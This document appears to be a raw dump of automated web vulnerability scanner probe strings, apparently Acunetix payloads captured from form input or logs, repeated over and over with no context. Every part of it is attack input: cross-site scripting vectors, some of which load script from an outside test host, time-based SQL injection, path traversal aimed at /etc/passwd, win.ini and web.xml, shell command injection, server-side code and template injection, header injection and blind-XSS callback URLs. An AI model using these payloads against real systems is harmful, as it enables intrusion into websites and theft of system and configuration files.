1some_inexistent_file_with_long_name%00.jpg

1&n954058=v928569

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

testasp.vulnweb.com

1

1

WEB-INF\web.xml

1

acu6288\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6288

"|"ld

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

acux4982\xc0\xbez1\xc0\xbcz2a\x90bcxuca4982

1

1

!(()&&!|*|*|

1<ScRiPt >prompt(984595)</ScRiPt>

1

1

1

1

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<script>prompt(929046)</script>

'"()

'

1

1

1

1

1

1<ScRiPt >prompt(978467)</ScRiPt>

/etc/passwd

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

"

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963430></ScRiPt>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

||cat /etc/passwd

1

1

'

1<ScRiPt >prompt(978959)</ScRiPt>

-1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

&dir

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1<video><source onerror="javascript:prompt(981628)">

1

1

'&dir&'

1

${@print(md5(acunetix_wvs_security_test))}

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977310)"></g></svg>

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1<div style=width:expression(prompt(980401))>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

uvO9u907'

1

"&dir&"

1

1

nKtYxBEd')

acunetix_wvs_invalid_filename

1<iframe src='data:text/html

http://hit389NFGbKpR.bxss.me/

1

1

comments

THytUUGr'))

|dir

1

1

1<body onload=prompt(938008)>

1

1

'|dir

file:///etc/passwd

comments

-1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(920044)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

-1)

"|dir

comments/.

'"

1

1

1

1<img src=xyz OnErRor=prompt(998759)>

/\../\../\../\../\../\../\../etc/passwd

-1))

<!--

1

1<img/src=">" onerror=alert(955951)>

1

1

1

1'"()&%<ScRiPt >prompt(913374)</ScRiPt>

1<ScRiPt%20>prompt(954567)</sCripT>

1

zr5Ca5xn'

1

WEB-INF/web.xml

1

1

'"()&%<ScRiPt >prompt(986375)</ScRiPt>

1

1

1

1

1&lt

jmUTBm51')

response.write(9144965*9362051)

WEB-INF\web.xml

1_989727

1

1

'+response.write(9144965*9362051)+'

1

1

4IGrt0aD'))

\xf6<img acu onmouseover=prompt(973850) //\xf6>

../../../../../../../../../../windows/win.ini

1

1

1<input autofocus onfocus=prompt(986783)>

"+response.write(9144965*9362051)+"

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

<a href='http://www.acunetix.com'>website security</a>

../../../../../../../../../../boot.ini

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

[url=http://www.acunetix.com]website security[/url]

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../windows/win.ini.jpg

1_JQKqq <ScRiPt >prompt(977890)</ScRiPt>

1

"&cat /etc/passwd&"

1

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

................windowswin.ini

1

`cat /etc/passwd`

1

1

1

|cat /etc/passwd#

1

${99148+100258}

../../../../../../../../../../etc/passwd.jpg

..\..\..\..\..\..\..\..\windows\win.ini

1

1

'|'ld

1

1

1

1

acu2555\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2555

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n916430=v905651

"|"ld

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1some_inexistent_file_with_long_name%00.jpg

1

acux7419\xc0\xbez1\xc0\xbcz2a\x90bcxuca7419

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1<ScRiPt >prompt(932738)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

1<script>prompt(937018)</script>

)

1

1

1

1<ScRiPt >prompt(998480)</ScRiPt>

!(()&&!|*|*|

1

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

WEB-INF/web.xml

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?980784></ScRiPt>

^(#$!@#$)(()))******

1

1

||cat /etc/passwd

1<ScRiPt >prompt(988502)</ScRiPt>

1

1

1

WEB-INF\web.xml

&dir

1

/etc/passwd

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<video><source onerror="javascript:prompt(926159)">

1

1

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(937726)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1

'&dir&'

1

'"()

1<div style=width:expression(prompt(975189))>

1

1

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<iframe src='data:text/html

"&dir&"

'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1))

1

1<body onload=prompt(955803)>

|dir

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

http://hitaPuqvIc1gC.bxss.me/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(989049)>

bj52AyJU'

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

'|dir

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

SMge3YBg')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

1

comments

1

1<img src=xyz OnErRor=prompt(938174)>

aWTy1e8F'))

http://www.acunetix.tst

"|dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'"

comments

-1

1<img/src=">" onerror=alert(930511)>

1

1

1'"()&%<ScRiPt >prompt(944480)</ScRiPt>

WEB-INF/web.xml

-1)

comments/.

<!--

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(983363)</ScRiPt>

1

1

1<ScRiPt%20>prompt(969619)</sCripT>

1

-1))

1

1

1_918835

1

1

fSMgp0Kh'

../../../../../../../../../../windows/win.ini

response.write(9108332*9516511)

1

1

1

8Kp7WPWh')

1&lt

1

../../../../../../../../../../boot.ini

'+response.write(9108332*9516511)+'

1

1

nPGr8BY6'))

1

\xf6<img acu onmouseover=prompt(923818) //\xf6>

1

"+response.write(9108332*9516511)+"

../../../../../../../../../../windows/win.ini.jpg

1

&cat /etc/passwd&

1<input autofocus onfocus=prompt(937974)>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

<a href='http://www.acunetix.com'>website security</a>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

1

................windowswin.ini

1

"&cat /etc/passwd&"

1_nJMr2 <ScRiPt >prompt(946293)</ScRiPt>

1

../../../../../../../../../../etc/passwd

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

acu2841\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2841

1

|cat /etc/passwd#

1

1

${99973+99963}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

acux1968\xc0\xbez1\xc0\xbcz2a\x90bcxuca1968

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

1

1

1<ScRiPt >prompt(988987)</ScRiPt>

"|"ld

1&n967887=v986675

1

1<script>prompt(913596)</script>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

WEB-INF/web.xml

1

1

1

1<ScRiPt >prompt(909436)</ScRiPt>

testasp.vulnweb.com

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF\web.xml

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

)

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?908273></ScRiPt>

1

"

!(()&&!|*|*|

/etc/passwd

1

1

1<ScRiPt >prompt(961328)</ScRiPt>

1

-1

1

1

||cat /etc/passwd

1

^(#$!@#$)(()))******

1<video><source onerror="javascript:prompt(972340)">

1

-1)

1

&dir

1

1

'&dir&'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(967868)"></g></svg>

1

1

"&dir&"

Jd84ipcM'

1<div style=width:expression(prompt(956406))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

9GqQjJDS')

'"()

1

1

|dir

1

1

1<iframe src='data:text/html

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

Y4JQTqQI'))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

'|dir

'

-1

1<body onload=prompt(986001)>

1

1

1

1

1

-1)

"

"|dir

http://hitRBTVqmrhDe.bxss.me/

acunetix_wvs_invalid_filename

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(926169)>

file:///etc/passwd

-1))

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

comments

/\../\../\../\../\../\../\../etc/passwd

1

1

qAJDQ0W2'

1<img src=xyz OnErRor=prompt(969325)>

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

comments

A1jP4LqA')

1<img/src=">" onerror=alert(934635)>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

WEB-INF/web.xml

comments/.

1

1

4OaFap6F'))

http://www.acunetix.tst

1<ScRiPt%20>prompt(959326)</sCripT>

1

1

1

WEB-INF\web.xml

1

1

1

'"

1

1

1&lt

1

../../../../../../../../../../windows/win.ini

1

<!--

\xf6<img acu onmouseover=prompt(911405) //\xf6>

1

1'"()&%<ScRiPt >prompt(927144)</ScRiPt>

1

1

1

1

../../../../../../../../../../boot.ini

'"()&%<ScRiPt >prompt(907712)</ScRiPt>

1

1<input autofocus onfocus=prompt(939889)>

1

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

../../../../../../../../../../windows/win.ini.jpg

1

1_938044

&cat /etc/passwd&

1

1

response.write(9700428*9024514)

[url=http://www.acunetix.com]website security[/url]

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1_LBmLs <ScRiPt >prompt(997455)</ScRiPt>

'+response.write(9700428*9024514)+'

'&cat /etc/passwd&'

................windowswin.ini

1

1

"+response.write(9700428*9024514)+"

1

"&cat /etc/passwd&"

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

1

SomeCustomInjectedHeader:injected_by_wvs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

|cat /etc/passwd#

1

1

${99537+100101}

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

'|'ld

1

1&n940743=v930129

WEB-INF/web.xml

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

WEB-INF\web.xml

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

acu5973\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5973

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

1

acux1812\xc0\xbez1\xc0\xbcz2a\x90bcxuca1812

)

1

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

!(()&&!|*|*|

1<ScRiPt >prompt(997964)</ScRiPt>

1

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<script>prompt(966541)</script>

1

^(#$!@#$)(()))******

/etc/passwd

"

1

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

||cat /etc/passwd

1

1

1

1<ScRiPt >prompt(961227)</ScRiPt>

1

'"()

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

'

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?977176></ScRiPt>

&dir

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

1<ScRiPt >prompt(937464)</ScRiPt>

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

'&dir&'

1<video><source onerror="javascript:prompt(931860)">

-1))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://hitlXdmHEWFD7.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

QxNQiOCz'

1

"&dir&"

1

acunetix_wvs_invalid_filename

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(925313)"></g></svg>

1

1

EuGKGR0B')

${@print(md5(acunetix_wvs_security_test))}\

1<div style=width:expression(prompt(965624))>

file:///etc/passwd

|dir

comments

1

1

G07RojF8'))

1

1

1<iframe src='data:text/html

'|dir

/\../\../\../\../\../\../\../etc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<body onload=prompt(933048)>

http://www.acunetix.tst

-1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(989826)>

"|dir

1

comments/.

WEB-INF/web.xml

1

-1)

'"

1

1

1'"()&%<ScRiPt >prompt(981852)</ScRiPt>

1<img src=xyz OnErRor=prompt(951280)>

1

WEB-INF\web.xml

<!--

-1))

1

1

1

1<img/src=">" onerror=alert(997832)>

'"()&%<ScRiPt >prompt(976600)</ScRiPt>

1

H25OEFG8'

1

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt%20>prompt(941031)</sCripT>

QZ3h4wKV')

1

1

1_997881

1

1&lt

../../../../../../../../../../boot.ini

1

response.write(9564038*9558644)

1

isp6xu1Q'))

1

\xf6<img acu onmouseover=prompt(921826) //\xf6>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<input autofocus onfocus=prompt(977933)>

'+response.write(9564038*9558644)+'

1

<a href='http://www.acunetix.com'>website security</a>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

"+response.write(9564038*9558644)+"

&cat /etc/passwd&

1

1

[url=http://www.acunetix.com]website security[/url]

................windowswin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1_i1MM3 <ScRiPt >prompt(996323)</ScRiPt>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

${100105+99989}

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1&n906662=v908933

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

WEB-INF/web.xml

1

testasp.vulnweb.com

acu5738\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5738

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

WEB-INF\web.xml

"|"ld

acux10100\xc0\xbez1\xc0\xbcz2a\x90bcxuca10100

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<ScRiPt >prompt(936403)</ScRiPt>

1

)

1

/etc/passwd

1

1<script>prompt(981857)</script>

!(()&&!|*|*|

1

1

'

1

1

^(#$!@#$)(()))******

1<ScRiPt >prompt(932619)</ScRiPt>

"

1

1

1

1

'"()

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?939093></ScRiPt>

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<ScRiPt >prompt(980134)</ScRiPt>

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

&dir

1

1<video><source onerror="javascript:prompt(920116)">

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

-1

'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(937728)"></g></svg>

1

1

-1)

1

"

1

acunetix_wvs_invalid_filename

1

1<div style=width:expression(prompt(998097))>

-1))

"&dir&"

1

${@print(md5(acunetix_wvs_security_test))}

1

1

http://hitbu7MAJ4ckW.bxss.me/

1

|dir

comments

tdBcMjI0'

1<iframe src='data:text/html

${@print(md5(acunetix_wvs_security_test))}\

file:///etc/passwd

1

1

1

comments

tay0mqBh')

1

1<body onload=prompt(955145)>

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

aB2oqAup'))

comments/.

1

"|dir

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(913717)>

1

1

-1

WEB-INF/web.xml

1

http://www.acunetix.tst

1

1<img src=xyz OnErRor=prompt(963524)>

1

1

'"

-1)

1

WEB-INF\web.xml

1

1

1

1

1<img/src=">" onerror=alert(906132)>

1

-1))

<!--

1'"()&%<ScRiPt >prompt(944049)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

1

1

gZRWHOlw'

1

1<ScRiPt%20>prompt(925336)</sCripT>

'"()&%<ScRiPt >prompt(953299)</ScRiPt>

response.write(9488114*9607012)

1

1

1

../../../../../../../../../../boot.ini

1

1&lt

A5v1K2Gm')

1_942624

'+response.write(9488114*9607012)+'

&cat /etc/passwd&

1

1

1

ALzkR3x5'))

"+response.write(9488114*9607012)+"

../../../../../../../../../../windows/win.ini.jpg

\xf6<img acu onmouseover=prompt(947554) //\xf6>

1

1

'&cat /etc/passwd&'

1

1

1<input autofocus onfocus=prompt(977994)>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

<a href='http://www.acunetix.com'>website security</a>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

................windowswin.ini

[url=http://www.acunetix.com]website security[/url]

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1_G6oms <ScRiPt >prompt(933078)</ScRiPt>

cat /etc/passwd

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

`cat /etc/passwd`

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

|cat /etc/passwd#

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99599+99751}

acu7102\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7102

1some_inexistent_file_with_long_name%00.jpg

acux5894\xc0\xbez1\xc0\xbcz2a\x90bcxuca5894

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

WEB-INF/web.xml

1<ScRiPt >prompt(992384)</ScRiPt>

1&n904777=v945876

1

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

WEB-INF\web.xml

1

1<script>prompt(981510)</script>

1

'

1

/etc/passwd

1

1

1<ScRiPt >prompt(945481)</ScRiPt>

1

"

1

1

1

1

||cat /etc/passwd

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910669></ScRiPt>

)

1

1<ScRiPt >prompt(984219)</ScRiPt>

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

'"()

1

!(()&&!|*|*|

&dir

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<video><source onerror="javascript:prompt(985839)">

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

'&dir&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919650)"></g></svg>

1

1

1

-1

^(#$!@#$)(()))******

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<div style=width:expression(prompt(944014))>

1

"&dir&"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

-1)

1<iframe src='data:text/html

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

'

|dir

1

1

1

1<body onload=prompt(971324)>

-1))

1

"

1

1

'|dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966826)>

http://hitVie0etTNqJ.bxss.me/

1

znHdHaA9'

${@print(md5(acunetix_wvs_security_test))}

1

1<img src=xyz OnErRor=prompt(996569)>

acunetix_wvs_invalid_filename

1

"|dir

1

${@print(md5(acunetix_wvs_security_test))}\

RLuUmmwj')

file:///etc/passwd

1

comments

1

1

1<img/src=">" onerror=alert(914985)>

1

1

comments

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

ZNzriM6O'))

/\../\../\../\../\../\../\../etc/passwd

1

1

1<ScRiPt%20>prompt(931090)</sCripT>

1

'"

comments/.

-1

1

1&lt

1

1

WEB-INF/web.xml

-1)

1

1'"()&%<ScRiPt >prompt(902953)</ScRiPt>

1

\xf6<img acu onmouseover=prompt(963342) //\xf6>

1

-1))

1

'"()&%<ScRiPt >prompt(985709)</ScRiPt>

1

WEB-INF\web.xml

1

<!--

kZ06gRI1'

1<input autofocus onfocus=prompt(945832)>

1

1

1_964951

1

<a href='http://www.acunetix.com'>website security</a>

response.write(9968064*9112098)

1

UMou0CNS')

1

1

../../../../../../../../../../windows/win.ini

1

1

[url=http://www.acunetix.com]website security[/url]

1

'+response.write(9968064*9112098)+'

GcE53HTf'))

SomeCustomInjectedHeader:injected_by_wvs

1_4qRqC <ScRiPt >prompt(929698)</ScRiPt>

1

"+response.write(9968064*9112098)+"

../../../../../../../../../../boot.ini

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../windows/win.ini.jpg

1

'&cat /etc/passwd&'

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1

1

................windowswin.ini

1

${100253+99261}

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

